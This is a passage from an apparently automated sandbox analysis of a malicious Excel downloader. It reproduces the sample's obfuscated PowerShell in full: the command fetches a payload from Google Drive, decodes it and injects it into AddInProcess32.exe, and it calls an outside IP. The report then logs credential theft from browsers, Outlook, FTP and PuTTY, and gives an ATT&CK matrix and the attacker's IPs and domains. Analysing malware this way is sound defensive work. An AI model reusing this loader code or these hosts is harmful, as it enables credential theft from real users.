vzyxrpdmfkb2y3vixmn1zkzxnhdgknkyd2ywrvzjdwjysnlgy3vmrlc2f0jysnaxzhzg9mn1yszjdwzgvzyxrpdmfkb2y3vixmn1yxzjdwlgy3vmrlc2f0axzhzg9mn1ypktsnks5szxbsqunfkchby2hbcl04ostby2hbcl05octby2hbcl03myksj3wnks5szxbsqunfkcdmn1ynlfttdhjjtkddw2noqxjdmzkplljlcgxbq0uokftjaefyxtq4k1tjaefyxtgxk1tjaefyxtk3kswnjccpick=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ( $env:comspec[4,15,25]-join'')( ('0qaimageurl = f7vht'+'tps://'+'drive.google.com/uc?export=download&id=1aivgjjjv1f6vs4suoybnh-sdvuhbywu'+'r f7v;0qawebclient = new-object system.net.webclient;0qaimagebytes = 0qawebclient.downloaddata(0qaimageurl'+');'+'0qaimagetext = [system.text.encoding]::utf8.getstring(0qaimagebytes);0qastartflag = f7v<<base64_start>>f7v;0qaendflag = f7v<<base64_end>>f7v;'+'0qastartindex = 0qaimag'+'etext.indexof(0qastar'+'tflag);0qaendindex ='+' 0qaimagetext.indexof(0qaendflag);0qastartindex -ge 0 -'+'and 0qaendindex -gt 0qastartindex;0qastartindex += 0qastartflag.length;0qab'+'ase64length '+'= 0qaendindex - 0qastartindex;0'+'qabase64command = 0qaimagetext.substring(0qastartindex, 0qabase'+'64length);0qabase64reverse'+'d = -join (0qabase64command.tochararray() ybi foreach-object { 0qa_ })[-1..-(0qabase64comma'+'nd.length)];0qacommandbytes = [system.convert]::frombase64string(0qabase64reversed);0qaloadedas'+'sembly = [system.reflection.assembly]::'+'load(0qacommandbytes);0qavaimethod = [dnlib.io.home].getmethod(f7vvaif7v);0qavaimethod.invoke(0qanull, @(f7vtxt.rreplms/53/141.671.3.291//:ptthf7v, f7vdesativadof7v, f7vdesativadof7v, f7vdesativadof7v, f'+'7vaddinprocess32f7v, f7vdesat'+'ivadof7v, f7vdes'+'ativadof7v,f7vdesativadof7v,'+'f7vdesativadof7v,f7vdesati'+'vadof7v'+',f7vdesat'+'ivadof7v,f7vdesativadof7v,f7v1f7v,f7vdesativadof7v));').replace(([char]89+[char]98+[char]73),'|').replace('f7v',[string][char]39).replace(([char]48+[char]81+[char]97),'$') )"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 16_2_00406069 GetUserNameW,16_2_00406069
                Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 16.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 1488, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 00000010.00000002.621074045.0000000000900000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: PopPassword16_2_0040D069
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: SmtpPassword16_2_0040D069
                Source: Yara matchFile source: 16.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information121
                Scripting
                Valid Accounts23
                Exploitation for Client Execution
                121
                Scripting
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                2
                OS Credential Dumping
                1
                Account Discovery
                Remote Services1
                Archive Collected Data
                5
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts121
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                1
                Access Token Manipulation
                21
                Obfuscated Files or Information
                2
                Credentials in Registry
                2
                File and Directory Discovery
                Remote Desktop Protocol1
                Browser Session Hijacking
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts4
                PowerShell
                Logon Script (Windows)211
                Process Injection
                1
                Install Root Certificate
                Security Account Manager14
                System Information Discovery
                SMB/Windows Admin Shares2
                Data from Local System
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                DLL Side-Loading
                NTDS1
                Security Software Discovery
                Distributed Component Object Model11
                Email Collection
                115
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Masquerading
                LSA Secrets1
                Process Discovery
                SSH1
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                Virtualization/Sandbox Evasion
                Cached Domain Credentials21
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Access Token Manipulation
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                Process Injection
                Proc Filesystem1
                System Owner/User Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                Remote System Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1541460 Sample: SecuriteInfo.com.W97M.DownL... Startdate: 24/10/2024 Architecture: WINDOWS Score: 100 77 Suricata IDS alerts for network traffic 2->77 79 Found malware configuration 2->79 81 Malicious sample detected (through community Yara rule) 2->81 83 20 other signatures 2->83 11 EXCEL.EXE 31 25 2->11         started        process3 dnsIp4 65 192.3.176.141, 49164, 49166, 49167 AS-COLOCROSSINGUS United States 11->65 67 mpa.li 5.159.62.244, 443, 49163 TLN-ASDE Germany 11->67 49 ~$SecuriteInfo.com...15.29545.30613.xlsx, data 11->49 dropped 51 nicegirlwithnewthi...hatkissingme[1].hta, HTML 11->51 dropped 111 Microsoft Office drops suspicious files 11->111 16 mshta.exe 10 11->16         started        file5 signatures6 process7 dnsIp8 55 5.159.62.243, 443, 49165 TLN-ASDE Germany 16->55 57 mpa.li 16->57 73 Suspicious powershell command line found 16->73 75 PowerShell case anomaly found 16->75 20 powershell.exe 24 16->20         started        signatures9 process10 file11 45 educationalthingsw...tattitudeonhere.vbS, Unicode 20->45 dropped 47 C:\Users\user\AppData\...\mgcx3ou4.cmdline, Unicode 20->47 dropped 85 Suspicious powershell command line found 20->85 87 Obfuscated command line found 20->87 24 wscript.exe 1 20->24         started        27 powershell.exe 4 20->27         started        29 csc.exe 2 20->29         started        signatures12 process13 file14 93 Suspicious powershell command line found 24->93 95 Wscript starts Powershell (via cmd or directly) 24->95 97 Bypasses PowerShell execution policy 24->97 101 2 other signatures 24->101 32 powershell.exe 4 24->32         started        99 Installs new ROOT certificates 27->99 53 C:\Users\user\AppData\Local\...\mgcx3ou4.dll, PE32 29->53 dropped 35 cvtres.exe 29->35         started        signatures15 process16 signatures17 69 Suspicious powershell command line found 32->69 71 Obfuscated command line found 32->71 37 powershell.exe 12 4 32->37         started        process18 dnsIp19 59 drive.google.com 142.250.186.46, 443, 49168 GOOGLEUS United States 37->59 61 drive.usercontent.google.com 172.217.16.193, 443, 49169 GOOGLEUS United States 37->61 89 Writes to foreign memory regions 37->89 91 Injects a PE file into a foreign processes 37->91 41 AddInProcess32.exe 95 37->41         started        signatures20 process21 dnsIp22 63 94.156.177.220, 49171, 49172, 49173 NET1-ASBG Bulgaria 41->63 103 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 41->103 105 Tries to steal Mail credentials (via file registry) 41->105 107 Tries to steal Mail credentials (via file / registry access) 41->107 109 2 other signatures 41->109 signatures23

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx37%ReversingLabsDocument-Word.Exploit.CVE-2017-0199
                SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://crl.entrust.net/server1.crl00%URL Reputationsafe
                http://ocsp.entrust.net030%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://go.micros0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                http://ocsp.entrust.net0D0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                https://secure.comodo.com/CPS00%URL Reputationsafe
                http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                drive.google.com
                142.250.186.46
                truefalse
                  unknown
                  drive.usercontent.google.com
                  172.217.16.193
                  truefalse
                    unknown
                    mpa.li
                    5.159.62.244
                    truefalse
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://mpa.li/ZDFWtOfalse
                        unknown
